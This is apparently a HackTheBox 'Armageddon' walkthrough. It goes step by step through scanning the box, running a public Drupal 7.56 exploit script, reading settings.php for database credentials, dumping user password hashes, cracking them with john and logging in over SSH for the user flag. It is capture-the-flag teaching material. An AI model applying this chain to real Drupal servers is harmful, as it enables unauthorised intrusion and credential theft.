HackTheBox : Armageddon Walkthrough

Step 1:

Let’s scan for open ports with Nmap

Command: nmap -A 10.10.10.233

We see open ports here:

22/tcp-SSH port

80/tcp-HTTP port

Step 2:

Lets check the http site on port 80:

If we look at the place where ‘CHANGELOG.txt’ is written in port 80, we will learn the version of Drupal.

Step 3:

Now let’s find exploit for Drupal 7.56

Command: searchspolit Drupal 7.56

Step 4:

Let’s infiltrate the system now

Command: ruby /usr/share/exploitdb/exploits/php/webapps/44449.rb 10.10.10.233

Step 5:

Let’s look inside

Command: ls

Now let’s look at all the files

Command: find

Now let’s check all the files and the file you see contains some information we need.

Let’s check the file

Command: cat /sites/default/settings.php

Step 6:

Let’s explore the tables in the database!

Command: mysql -u ****** -p************** -D drupal -e ‘show tables;’

When we look at the whole list, we see a list of ‘users’ with possible names and passwords.

Lets check the users list!

Command: mysql -u ********* -p****************** -D drupal -e ‘select * from users;’

We get 2 users and password hashes one of which is an admin!

You can crack this password with the ‘john’ tool.

Step 7:

Now let’s connect to ssh-a with the information we have.

Command : ssh username@10.10.10.233

We are in

Checking the file system we have user.txt our first flag!